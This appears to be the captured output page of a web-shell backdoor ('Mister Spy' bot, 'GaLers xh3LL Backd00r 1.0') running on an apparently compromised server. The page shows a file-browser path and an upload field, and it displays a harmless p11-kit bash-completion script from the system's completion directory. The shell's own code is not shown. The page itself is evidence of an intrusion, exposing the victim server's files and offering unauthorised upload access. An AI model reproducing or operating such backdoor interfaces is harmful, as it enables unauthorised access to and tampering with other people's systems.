Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /usr/share/bash-completion/completions/
Upload File :
Current File : //usr/share/bash-completion/completions/p11-kit

# p11-kit(8) completion                                       -*- shell-script -*-

_p11-kit()
{
    local cur prev words cword
    _init_completion || return

    if [[ $cur == -* ]]; then
        local opts="--help --verbose -q --quiet"
        COMPREPLY=( $(compgen -W "$opts" -- "$cur") )
        return
    elif [[ $cword -eq 1 ]]; then
        local commands='list-mechanisms generate-keypair import-object export-object delete-object list-objects add-profile delete-profile list-profiles list-modules list-tokens print-config extract server remote'
        COMPREPLY=( $(compgen -W "$commands" -- "$cur") )
    fi
} &&
complete -F _p11-kit p11-kit

# ex: filetype=sh

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat